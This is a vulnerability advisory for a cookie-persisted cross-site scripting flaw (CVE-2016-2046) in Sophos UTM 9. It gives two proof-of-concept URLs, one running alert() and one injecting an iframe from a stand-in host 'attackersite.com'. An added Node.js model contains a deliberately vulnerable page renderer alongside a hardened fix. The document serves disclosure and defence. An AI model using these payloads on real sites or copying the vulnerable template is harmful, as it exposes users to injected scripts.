Title: CVE-2016-2046 – CROSS SITE SCRIPTING IN SOPHOS UTM 9
Product: Sophos UTM 9
Version: 9.350-12 with pattern version 92405 (earlier versions potentially affected)
Vendor Notified Date: December 14, 2015
Vendor Resolved Date: December 18, 2015
Release Date: January 28, 2016
Authentication: Not Required
Exploit steps for proof-of-concept:
- A pop-up box is displayed as a result of the payload being executed.
- Reproduction URL: https://XXX.XXX.XXX.XXX/?lang=english";alert('xss');//
- Reproduction URL: https://vulnerablehost.com/?lang=english%22;</script><iframe width%3d800 height%3d600 src%3dhttp://attackersite.com/html_injection_content.html></iframe><!--//
- Typically this would be classed as reflected XSS. However, once the targeted user visits one of the PoC links above, the value passed in the 'lang' parameter is stored in a cookie named 'eup_force_lang' in the user's browser. Once that cookie is set, the user no longer needs to visit the crafted link: the cookie value is injected into the page automatically on every subsequent visit, so the payload persists until the cookie is cleared from the browser.
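The following is an added example and is not code from Sophos UTM or from HALOCK; the advisory does not show the vulnerable template, so this is a minimal Node.js model of the behaviour it describes. It assumes that the 'lang' value is written into an inline script string literal, that a request carrying ?lang= stores the value in the 'eup_force_lang' cookie, and that a request without the parameter reads the cookie back. The allowlist of language names, the cookie jar and the page markup are also assumptions. The model renders the page both the vulnerable way and a hardened way, replays the advisory's two PoC URLs, and shows the reflected payload surviving a later visit to the clean URL.

```javascript
// Added example (not Sophos UTM code): a model of the eup_force_lang behaviour
// described in the advisory. Template, cookie store and allowlist are assumed.

const DEFAULT_LANG = 'english';
const ALLOWED_LANGS = new Set(['english', 'german', 'french', 'japanese', 'spanish']); // assumed

// The advisory's two PoC URLs in percent-encoded form (the second already is).
const POC_ALERT = 'https://vulnerablehost.com/?lang=english%22;alert(%27xss%27);//';
const POC_IFRAME = 'https://vulnerablehost.com/?lang=english%22;</script><iframe width%3d800 height%3d600 src%3dhttp://attackersite.com/html_injection_content.html></iframe><!--//';

// Vulnerable rendering: the parameter is concatenated straight into a JS string
// literal, so a '"' ends the literal and the rest of the value runs as code
// (or, with '</script>', ends the script block and injects raw HTML).
function renderVulnerable(lang) {
  return '<html><head><script>var eup_lang = "' + lang + '";</script></head>' +
         '<body><h1>User Portal</h1></body></html>';
}

// Build a JS string literal from untrusted text. JSON.stringify quotes it and
// escapes '"', '\\' and control characters; '<' is additionally encoded so a
// value containing '</script>' cannot terminate the surrounding script block.
function jsStringLiteral(value) {
  return JSON.stringify(String(value)).replace(/</g, '\\u003c');
}

// Hardened rendering: only an allowlisted language name is accepted at all
// (anything else falls back to the default), and the value is still emitted
// through jsStringLiteral as defence in depth.
function renderHardened(lang) {
  const safe = ALLOWED_LANGS.has(lang) ? lang : DEFAULT_LANG;
  return '<html><head><script>var eup_lang = ' + jsStringLiteral(safe) + ';</script></head>' +
         '<body><h1>User Portal</h1></body></html>';
}

// Minimal stand-in for the browser's cookie store for one origin.
class CookieJar {
  constructor() { this.cookies = new Map(); }
  set(name, value) { this.cookies.set(name, value); }
  get(name) { return this.cookies.has(name) ? this.cookies.get(name) : null; }
  clear() { this.cookies.clear(); }
}

// One request/response cycle: '?lang=' overrides and persists the language in
// the eup_force_lang cookie; without the parameter the cookie value is reused,
// which is what turns a one-off reflected payload into a persistent one.
function handleRequest(jar, url, render) {
  const query = new URL(url).searchParams;   // percent-decodes %22, %27, %3d, ...
  let lang = query.get('lang');
  if (lang !== null) {
    jar.set('eup_force_lang', lang);
  } else {
    const stored = jar.get('eup_force_lang');
    lang = stored !== null ? stored : DEFAULT_LANG;
  }
  return render(lang);
}

// Crude detector for this demo only: the template emits exactly one <script>
// and no <iframe>, so an extra script, an iframe or an alert( call means the
// payload reached the page intact.
function payloadExecutes(html) {
  const scripts = (html.match(/<script/gi) || []).length;
  return scripts !== 1 || /<iframe/i.test(html) || /alert\(/.test(html);
}

// Replay the advisory's scenario: the victim follows the crafted link once,
// then later opens the clean URL with no parameter at all.
function scenario(render, craftedUrl) {
  const jar = new CookieJar();
  const first = handleRequest(jar, craftedUrl, render);
  const later = handleRequest(jar, 'https://vulnerablehost.com/', render);
  return {
    firstVisit: payloadExecutes(first),
    laterVisit: payloadExecutes(later),
    cookie: jar.get('eup_force_lang'),
  };
}

console.log('vulnerable, alert PoC :', scenario(renderVulnerable, POC_ALERT));
console.log('vulnerable, iframe PoC:', scenario(renderVulnerable, POC_IFRAME));
console.log('hardened,   alert PoC :', scenario(renderHardened, POC_ALERT));
console.log('hardened,   iframe PoC:', scenario(renderHardened, POC_IFRAME));
```

Run with `node`. The vulnerable renderer reports the payload on both the first and the later visit, because the cookie now carries it; the hardened renderer reports it on neither, even though the same raw value sits in the cookie, because an unrecognised language name never reaches the page. Validating before the cookie is written is the cleaner fix, but validating at render time is what protects users whose browsers already hold a poisoned cookie.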
UTM 9.353, which includes a fix for this vulnerability, was officially announced and released on January 28, 2016.
HALOCK Security Labs